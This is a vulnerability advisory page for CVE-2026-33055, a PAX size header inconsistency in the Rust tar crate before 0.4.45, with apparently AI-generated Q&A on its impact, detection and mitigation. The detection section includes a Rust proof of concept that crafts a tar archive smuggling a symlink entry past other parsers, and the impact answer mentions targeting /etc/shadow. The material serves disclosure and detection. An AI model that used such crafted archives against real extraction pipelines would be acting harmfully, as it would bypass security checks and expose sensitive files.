CVE-2026-33055
Status: Received - Intake
Inconsistent Tar Header Size Validation in tar-rs Library

Publication date: 2026-03-20

Last updated on: 2026-03-23

Assigner: GitHub, Inc.

Description
tar-rs is a tar archive reading/writing library for Rust. Versions 0.4.44 and below contain conditional logic that skips the PAX size header whenever the base (ustar) header size is nonzero. As part of CVE-2025-62518, the astral-tokio-tar project was changed to correctly honor PAX size headers when they differ from the base header; this issue is almost the inverse of that one. Any discrepancy in how tar parsers determine an entry's size can be used to craft archives that unpack differently under different archivers. Here the tar-rs (Rust tar) crate is the outlier in consulting the base header size before applying the override: other tar parsers (including, for example, Go's archive/tar) unconditionally use the PAX size override. This can affect anything that uses the tar crate to parse archives and expects a view consistent with other parsers. The issue has been fixed in version 0.4.45.
Meta Information
Generated: 2026-05-07
AI Q&A: 2026-03-20
EPSS Evaluated: 2026-05-05
Affected Vendors & Products
Vendor: alexcrichton
Product: tar-rs
Version range: all versions before 0.4.45 (0.4.45 excluded)
CWE
CWE-843 (Access of Resource Using Incompatible Type, 'Type Confusion'): The product allocates or initializes a resource such as a pointer, object, or variable using one type, but it later accesses that resource using a type that is incompatible with the original type. Note that the defect described above is an inconsistent interpretation of the size field between parsers rather than a memory-type confusion; the CWE mapping is simply the one recorded for this entry.
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2026-33055 is a vulnerability in the Rust tar crate (tar-rs) versions up to 0.4.44, caused by incorrect handling of PAX size headers in tar archives. Specifically, tar-rs applies the PAX size override only if the base header size is zero and ignores it when the base header size is nonzero. Other tar parsers always honor the PAX size override, regardless of the base header value.

This discrepancy allows attackers to craft tar archives that unpack differently depending on the parser used, which can be abused to smuggle entries such as symlinks. For example, a malicious archive can declare a large size in the PAX header but a smaller size in the base header: tar-rs consumes only the base-header size, so bytes that other parsers treat as file contents are read by tar-rs as further entry headers, exposing entries that other parsers never see. The reverse mismatch (a smaller PAX size than the base size) hides entries from tar-rs that other parsers extract.

The issue was fixed in tar-rs version 0.4.45 by changing the logic to always honor the PAX size override regardless of the base header size.


How can this vulnerability impact me?

This vulnerability can impact any software that uses the tar-rs crate to parse tar archives and expects behavior consistent with other tar parsers. Because tar-rs determines entry sizes differently, a maliciously crafted archive can carry entries, such as symlinks or other unexpected file types, that tar-rs exposes but other parsers treat as file contents, or vice versa.

Such discrepancies can be used to bypass security checks performed with a different parser, to extract files that the checking side never saw, or to expose sensitive files. For example, a crafted archive could include a symlink entry pointing at a sensitive path such as "/etc/shadow" that is extracted only by tar-rs, potentially leading to privilege escalation or data leakage.

The risk is greatest where different tar parsers are used at different stages of the same pipeline, such as client-side tooling built on tar-rs and server-side tooling built on astral-tokio-tar, which creates opportunities for archive smuggling attacks. [1, 2]


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:

I don't know


How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability involves the tar-rs crate incorrectly handling PAX size headers, so it can be detected by analyzing tar archives for a PAX size record that disagrees with the base header size, and by checking which version of the tar crate your software links.

A practical detection approach is to create or obtain a proof-of-concept tar archive that contains a PAX extended header with a size override differing from the base header size, with smuggled entries such as symlinks placed in the region the two sizes disagree about.

By unpacking such an archive with tar-rs versions up to 0.4.44 and comparing the result with other tar parsers (e.g., astral-tokio-tar or Go's archive/tar), you can observe the inconsistent entry list that indicates the vulnerability.

No specific commands are provided in the referenced resources. For a Rust project, cargo tree -i tar lists which crates pull in the tar crate and at what version, and the tar package entry in Cargo.lock shows whether the resolved version is below 0.4.45. You can also run test code that parses a suspicious archive with tar-rs and checks whether entries hidden from other parsers appear. [1, 2]
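The size discrepancy described in the first answer and the proof-of-concept comparison described in the detection answer, as an added example that is not part of this page and not code from the tar crate: the program below hand-builds a tar archive whose PAX size record (1536) disagrees with the base ustar header (512) and places a symlink header inside the PAX-declared region, then lists the entries with a minimal std-only parser written for this example under both policies, the base-size-wins rule the advisory attributes to tar 0.4.44 and below, and the unconditional PAX override used by tar 0.4.45 and Go's archive/tar. The entry names, the hidden-link symlink and its target are constructed sample data, and the parser is a stand-in for illustration, not the crate's implementation.

```rust
// Added example (not from the tar crate): differential view of one archive
// under the two PAX size policies named in the advisory.
const BLOCK: usize = 512;

fn pad(n: usize) -> usize {
    (n + BLOCK - 1) / BLOCK * BLOCK
}

/// Build one 512-byte ustar header with a valid checksum.
/// typeflag: b'0' regular file, b'2' symlink, b'x' PAX extended header.
fn header(name: &str, size: usize, typeflag: u8, linkname: &str) -> [u8; BLOCK] {
    let mut h = [0u8; BLOCK];
    h[..name.len()].copy_from_slice(name.as_bytes());
    h[100..108].copy_from_slice(b"0000644\0"); // mode
    h[108..116].copy_from_slice(b"0000000\0"); // uid
    h[116..124].copy_from_slice(b"0000000\0"); // gid
    h[124..136].copy_from_slice(format!("{:011o}\0", size).as_bytes()); // base size
    h[136..148].copy_from_slice(b"00000000000\0"); // mtime
    h[156] = typeflag;
    h[157..157 + linkname.len()].copy_from_slice(linkname.as_bytes());
    h[257..263].copy_from_slice(b"ustar\0");
    h[263..265].copy_from_slice(b"00");
    // The checksum is the byte sum with the chksum field itself counted as spaces.
    h[148..156].copy_from_slice(b"        ");
    let sum: u32 = h.iter().map(|&b| b as u32).sum();
    h[148..156].copy_from_slice(format!("{:06o}\0 ", sum).as_bytes());
    h
}

/// PAX record "<len> key=value\n", where len counts the whole record.
fn pax_record(key: &str, value: &str) -> Vec<u8> {
    let body = format!(" {}={}\n", key, value);
    let mut len = body.len() + 1;
    while len.to_string().len() + body.len() != len {
        len += 1;
    }
    format!("{}{}", len, body).into_bytes()
}

/// Constructed sample archive: PAX says 1536 bytes, base header says 512.
/// Bytes 512..1536 of the PAX-declared region hold a symlink header.
fn crafted_archive() -> Vec<u8> {
    let mut out = Vec::new();
    let record = pax_record("size", "1536");
    out.extend_from_slice(&header("PaxHeaders/payload", record.len(), b'x', ""));
    out.extend_from_slice(&record);
    out.resize(pad(out.len()), 0);
    out.extend_from_slice(&header("payload", 512, b'0', ""));
    out.extend_from_slice(&[b'A'; BLOCK]); // what a base-size parser sees as payload
    out.extend_from_slice(&header("hidden-link", 0, b'2', "smuggled-target"));
    out.resize(out.len() + BLOCK, 0); // remainder of the 1536-byte region
    out.resize(out.len() + 2 * BLOCK, 0); // end-of-archive marker
    out
}

#[derive(Debug, PartialEq)]
struct Entry {
    name: String,
    typeflag: u8,
    size: usize,
}

fn octal(field: &[u8]) -> usize {
    let s = String::from_utf8_lossy(field);
    let s = s.trim_matches(|c: char| c == '\0' || c == ' ');
    usize::from_str_radix(s, 8).unwrap_or(0)
}

fn cstr(field: &[u8]) -> String {
    let end = field.iter().position(|&b| b == 0).unwrap_or(field.len());
    String::from_utf8_lossy(&field[..end]).into_owned()
}

fn checksum_ok(h: &[u8]) -> bool {
    let sum: u32 = h
        .iter()
        .enumerate()
        .map(|(i, &b)| if (148..156).contains(&i) { b' ' as u32 } else { b as u32 })
        .sum();
    octal(&h[148..156]) as u32 == sum
}

/// List entries. With `pax_overrides_nonzero_base == false` the PAX size is
/// used only when the base size is zero (the tar <= 0.4.44 behaviour);
/// with `true` the PAX size always wins (tar 0.4.45, Go archive/tar).
fn list_entries(archive: &[u8], pax_overrides_nonzero_base: bool) -> Result<Vec<Entry>, String> {
    let mut entries = Vec::new();
    let mut pos = 0;
    let mut pax_size: Option<usize> = None;
    while pos + BLOCK <= archive.len() {
        let h = &archive[pos..pos + BLOCK];
        if h.iter().all(|&b| b == 0) {
            break; // end-of-archive marker
        }
        if !checksum_ok(h) {
            return Err(format!("bad header checksum at offset {}", pos));
        }
        let base_size = octal(&h[124..136]);
        let typeflag = h[156];
        pos += BLOCK;
        if typeflag == b'x' {
            let end = pos.checked_add(base_size).filter(|&e| e <= archive.len()).ok_or("truncated PAX header")?;
            let text = String::from_utf8_lossy(&archive[pos..end]);
            for line in text.lines() {
                if let Some((_, kv)) = line.split_once(' ') {
                    if let Some(v) = kv.strip_prefix("size=") {
                        pax_size = v.parse().ok();
                    }
                }
            }
            pos += pad(base_size);
            continue;
        }
        let size = match pax_size.take() {
            Some(s) if base_size == 0 || pax_overrides_nonzero_base => s,
            _ => base_size,
        };
        entries.push(Entry { name: cstr(&h[..100]), typeflag, size });
        pos += pad(size);
    }
    Ok(entries)
}

fn main() {
    let archive = crafted_archive();
    for (label, policy) in [("base size wins (tar <= 0.4.44)", false), ("PAX size wins (tar 0.4.45, Go)", true)] {
        println!("{}:", label);
        for e in list_entries(&archive, policy).unwrap() {
            println!("  {:?}", e);
        }
    }
}
```

Under the base-size policy the listing contains the payload entry at 512 bytes followed by the hidden-link symlink; under the PAX-override policy it contains a single 1536-byte payload entry and the symlink header is just file content. Feeding the same bytes to the real tar crate before and after 0.4.45, or to Go's archive/tar, reproduces that split.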


What immediate steps should I take to mitigate this vulnerability?

The immediate mitigation step is to upgrade the tar-rs crate to version 0.4.45 or later, where the vulnerability has been fixed by changing the parsing logic to unconditionally honor the PAX size override.

This update ensures consistent handling of PAX size headers across tar parsers and prevents malicious tar archives from smuggling unauthorized entries.

Additionally, review any software or systems that rely on tar-rs for archive parsing and ensure they are updated accordingly to avoid exposure to this issue.

